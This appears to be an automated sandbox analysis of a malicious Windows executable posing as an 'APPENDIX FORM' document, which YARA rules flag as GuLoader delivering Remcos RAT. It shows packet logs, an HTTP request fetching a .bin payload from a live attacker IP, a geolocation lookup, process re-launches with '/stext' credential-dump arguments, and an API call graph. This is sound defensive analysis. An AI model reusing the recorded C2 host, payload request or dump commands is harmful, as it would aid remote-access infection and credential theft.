                                                                                                            Nov 21, 2024 12:20:22.457703114 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.457842112 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.457880974 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.458631039 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.458741903 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.458779097 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.459675074 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.459695101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.459732056 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.460743904 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.460871935 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.460915089 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.461759090 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.461868048 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.461913109 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.462874889 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.463030100 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.463074923 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.463866949 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464083910 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464128017 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.464881897 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464986086 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.465023994 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.465919971 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.466027975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.466072083 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.466959953 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.467066050 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.467112064 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.468112946 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.468174934 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.468219042 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.469054937 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.469276905 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.469382048 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.470102072 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.470215082 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.470261097 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.471147060 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.471198082 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.471241951 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.472198963 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.472295046 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.472327948 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.473216057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.473311901 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.473345995 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.474257946 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.474466085 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.474512100 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.475366116 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.475382090 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.475421906 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.476356030 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.476440907 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.476486921 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.477385998 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.477499008 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.477533102 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.478487015 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.478559971 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.478598118 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.479515076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.479640007 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.479675055 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.480613947 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.480633974 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.480670929 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.481597900 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.481729031 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.481766939 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.483213902 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.483232975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.483266115 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.484435081 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484450102 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484482050 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.484812975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484834909 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484870911 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.485719919 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.485924006 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.485966921 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.486802101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.486893892 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.486936092 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.487812996 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.487932920 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.487973928 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.488866091 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.488959074 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.488998890 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.489896059 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.489917994 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.489970922 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.490935087 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.491056919 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.491095066 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.492001057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.492105961 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.492139101 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.493046045 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.493145943 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.493179083 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.494062901 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.494165897 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.494199991 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.495134115 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.495238066 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.495292902 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.496289015 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.496332884 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.496376991 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.497208118 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.497307062 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.497353077 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.498300076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.498366117 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.498410940 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.499289989 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.499494076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.499532938 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.500341892 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.500488997 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.500529051 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.501403093 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.501537085 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.501585007 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.502401114 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.502563953 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.502610922 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.503604889 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.503676891 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.503720999 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.504566908 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.504667044 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.504713058 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.505877972 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.505933046 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.505980968 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.506578922 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.553447962 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.662400007 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662425041 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662580967 CET4984011371192.168.2.745.133.158.36
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 12:20:19.310261011 CET | 53439 | 53 | 192.168.2.7 | 1.1.1.1
Nov 21, 2024 12:20:19.538218975 CET | 53 | 53439 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 12:20:19.310261011 CET | 192.168.2.7 | 1.1.1.1 | 0xdb65 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 12:19:18.142230034 CET | 1.1.1.1 | 192.168.2.7 | 0x8764 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 12:19:18.142230034 CET | 1.1.1.1 | 192.168.2.7 | 0x8764 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:20:19.538218975 CET | 1.1.1.1 | 192.168.2.7 | 0xdb65 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• 45.133.158.36
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49826 | 45.133.158.36 | 80 | 6836 | C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:20:14.208904982 CET | 184 | OUT | GET /cvTLIRXJzBJoApmtjAY235.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: 45.133.158.36
Cache-Control: no-cache
Nov 21, 2024 12:20:15.334956884 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 20 Nov 2024 08:11:15 GMT
Accept-Ranges: bytes
ETag: "9afe7c5233bdb1:0"
Server: Microsoft-IIS/10.0
Date: Thu, 21 Nov 2024 11:20:15 GMT
Content-Length: 493120


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49842 | 178.237.33.50 | 80 | 6836 | C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:20:19.661390066 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 21, 2024 12:20:20.949599028 CET | 1170 | IN | HTTP/1.1 200 OK
date: Thu, 21 Nov 2024 11:20:20 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



Target ID: 0
Start time: 06:19:20
Start date: 21/11/2024
Path: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
Imagebase: 0x400000
File size: 697'930 bytes
MD5 hash: CF4530628BDB401E066EA81E86403D77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 06:20:07
Start date: 21/11/2024
Path: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
Imagebase: 0x400000
File size: 697'930 bytes
MD5 hash: CF4530628BDB401E066EA81E86403D77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

                                                                                                            Target ID:8
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:06:20:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:697'930 bytes
                                                                                                            MD5 hash:CF4530628BDB401E066EA81E86403D77
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true


Execution Graph

Execution Coverage: 18.9%
Dynamic/Decrypted Code Coverage: 15.3%
Signature Coverage: 20.2%
Total number of Nodes: 1513
Total number of Limit Nodes: 43

[execution_graph: serialized data of the interactive graph viewer; nodes are function addresses in the main image (0x401000 range) and in a loaded module (0x10001000 range), annotated with the Windows API calls made from each function (for example GlobalAlloc, RegOpenKeyExA, VirtualAllocEx, VirtualProtect, FindFirstFileA, ShellExecuteA, LoadLibraryA/GetProcAddress), and edges are caller->callee relationships]
404035 8 API calls 5473->5481 5477 404183 5474->5477 5478 4042c8 5475->5478 5479 40433a 5475->5479 5476->5472 5476->5473 5480 40427d GetDlgItem SendMessageA 5476->5480 5482 403fce 19 API calls 5477->5482 5478->5479 5483 4042ee 6 API calls 5478->5483 5479->5473 5484 40434c 5479->5484 5501 403ff0 EnableWindow 5480->5501 5492 404377 5481->5492 5486 404190 CheckDlgButton 5482->5486 5483->5479 5487 404352 SendMessageA 5484->5487 5488 404363 5484->5488 5499 403ff0 EnableWindow 5486->5499 5487->5488 5488->5492 5493 404369 SendMessageA 5488->5493 5489 4042a3 5494 4043a1 SendMessageA 5489->5494 5491 4041ae GetDlgItem 5500 404003 SendMessageA 5491->5500 5493->5492 5494->5472 5496 4041c4 SendMessageA 5497 4041e2 GetSysColor 5496->5497 5498 4041eb SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5496->5498 5497->5498 5498->5492 5499->5491 5500->5496 5501->5489 4125 401918 4126 40191a 4125->4126 4127 4029ff 18 API calls 4126->4127 4128 40191f 4127->4128 4131 4055a0 4128->4131 4171 40585e 4131->4171 4134 4055c8 DeleteFileA 4140 401928 4134->4140 4135 4055df 4149 40570d 4135->4149 4185 405ce0 lstrcpynA 4135->4185 4137 405605 4138 405618 4137->4138 4139 40560b lstrcatA 4137->4139 4186 4057b7 lstrlenA 4138->4186 4141 40561e 4139->4141 4145 40562c lstrcatA 4141->4145 4147 405637 lstrlenA FindFirstFileA 4141->4147 4143 405fe4 2 API calls 4144 405731 4143->4144 4144->4140 4146 405735 4144->4146 4145->4147 4199 405770 lstrlenA CharPrevA 4146->4199 4147->4149 4154 40565b 4147->4154 4149->4140 4149->4143 4151 40579b CharNextA 4151->4154 4152 405558 5 API calls 4153 405747 4152->4153 4155 405761 4153->4155 4156 40574b 4153->4156 4154->4151 4157 4056ec FindNextFileA 4154->4157 4168 4056ad 4154->4168 4190 405ce0 lstrcpynA 4154->4190 4159 404fcb 25 API calls 4155->4159 4156->4140 4161 404fcb 25 API calls 4156->4161 4157->4154 4160 405704 FindClose 4157->4160 4159->4140 4160->4149 4162 405758 4161->4162 4163 405b94 40 API calls 4162->4163 4166 40575f 4163->4166 4165 4055a0 64 API 
calls 4165->4168 4166->4140 4167 404fcb 25 API calls 4167->4157 4168->4157 4168->4165 4168->4167 4169 404fcb 25 API calls 4168->4169 4170 405b94 40 API calls 4168->4170 4191 405558 4168->4191 4169->4168 4170->4168 4202 405ce0 lstrcpynA 4171->4202 4173 40586f 4203 405809 CharNextA CharNextA 4173->4203 4176 4055c0 4176->4134 4176->4135 4177 405f4b 5 API calls 4183 405885 4177->4183 4178 4058b0 lstrlenA 4179 4058bb 4178->4179 4178->4183 4181 405770 3 API calls 4179->4181 4180 405fe4 2 API calls 4180->4183 4182 4058c0 GetFileAttributesA 4181->4182 4182->4176 4183->4176 4183->4178 4183->4180 4184 4057b7 2 API calls 4183->4184 4184->4178 4185->4137 4187 4057c4 4186->4187 4188 4057d5 4187->4188 4189 4057c9 CharPrevA 4187->4189 4188->4141 4189->4187 4189->4188 4190->4154 4209 40594c GetFileAttributesA 4191->4209 4194 405585 4194->4168 4195 405573 RemoveDirectoryA 4197 405581 4195->4197 4196 40557b DeleteFileA 4196->4197 4197->4194 4198 405591 SetFileAttributesA 4197->4198 4198->4194 4200 40573b 4199->4200 4201 40578a lstrcatA 4199->4201 4200->4152 4201->4200 4202->4173 4204 405824 4203->4204 4207 405834 4203->4207 4206 40582f CharNextA 4204->4206 4204->4207 4205 405854 4205->4176 4205->4177 4206->4205 4207->4205 4208 40579b CharNextA 4207->4208 4208->4207 4210 405564 4209->4210 4211 40595e SetFileAttributesA 4209->4211 4210->4194 4210->4195 4210->4196 4211->4210 5502 10001058 5503 1000123b 3 API calls 5502->5503 5505 10001074 5503->5505 5504 100010dc 5505->5504 5506 10001091 5505->5506 5507 100014d8 4 API calls 5505->5507 5508 100014d8 4 API calls 5506->5508 5507->5506 5509 100010a1 5508->5509 5510 100010b1 5509->5510 5511 100010a8 GlobalSize 5509->5511 5512 100010b5 GlobalAlloc 5510->5512 5513 100010c6 5510->5513 5511->5510 5514 100014ff 3 API calls 5512->5514 5515 100010d1 GlobalFree 5513->5515 5514->5513 5515->5504 4212 403219 #17 SetErrorMode OleInitialize 4213 40600b 3 API calls 4212->4213 4214 40325e SHGetFileInfoA 4213->4214 4285 405ce0 lstrcpynA 4214->4285 4216 
403289 GetCommandLineA 4286 405ce0 lstrcpynA 4216->4286 4218 40329b GetModuleHandleA 4219 4032b2 4218->4219 4220 40579b CharNextA 4219->4220 4221 4032c6 CharNextA 4220->4221 4229 4032d6 4221->4229 4222 4033a0 4223 4033b3 GetTempPathA 4222->4223 4287 4031e5 4223->4287 4225 4033cb 4226 403425 DeleteFileA 4225->4226 4227 4033cf GetWindowsDirectoryA lstrcatA 4225->4227 4295 402c7b GetTickCount GetModuleFileNameA 4226->4295 4230 4031e5 11 API calls 4227->4230 4228 40579b CharNextA 4228->4229 4229->4222 4229->4228 4233 4033a2 4229->4233 4232 4033eb 4230->4232 4232->4226 4235 4033ef GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4232->4235 4380 405ce0 lstrcpynA 4233->4380 4239 4031e5 11 API calls 4235->4239 4236 4034cf 4383 403677 4236->4383 4237 403439 4237->4236 4240 4034bf 4237->4240 4244 40579b CharNextA 4237->4244 4242 40341d 4239->4242 4325 403769 4240->4325 4242->4226 4242->4236 4245 403454 4244->4245 4251 40349a 4245->4251 4252 4034fe lstrcatA lstrcmpiA 4245->4252 4246 4034e8 4248 4054f4 MessageBoxIndirectA 4246->4248 4247 4035dc 4249 40365f ExitProcess 4247->4249 4254 40600b 3 API calls 4247->4254 4253 4034f6 ExitProcess 4248->4253 4256 40585e 18 API calls 4251->4256 4252->4236 4257 40351a CreateDirectoryA SetCurrentDirectoryA 4252->4257 4255 4035eb 4254->4255 4258 40600b 3 API calls 4255->4258 4259 4034a5 4256->4259 4260 403531 4257->4260 4261 40353c 4257->4261 4262 4035f4 4258->4262 4259->4236 4381 405ce0 lstrcpynA 4259->4381 4392 405ce0 lstrcpynA 4260->4392 4393 405ce0 lstrcpynA 4261->4393 4265 40600b 3 API calls 4262->4265 4267 4035fd 4265->4267 4269 40364b ExitWindowsEx 4267->4269 4276 40360b GetCurrentProcess 4267->4276 4268 4034b4 4382 405ce0 lstrcpynA 4268->4382 4269->4249 4272 403658 4269->4272 4271 405d02 18 API calls 4273 40357b DeleteFileA 4271->4273 4397 40140b 4272->4397 4275 403588 CopyFileA 4273->4275 4282 40354a 4273->4282 4275->4282 4279 40361b 4276->4279 4277 4035d0 4280 405b94 40 API calls 4277->4280 4278 405b94 40 API 
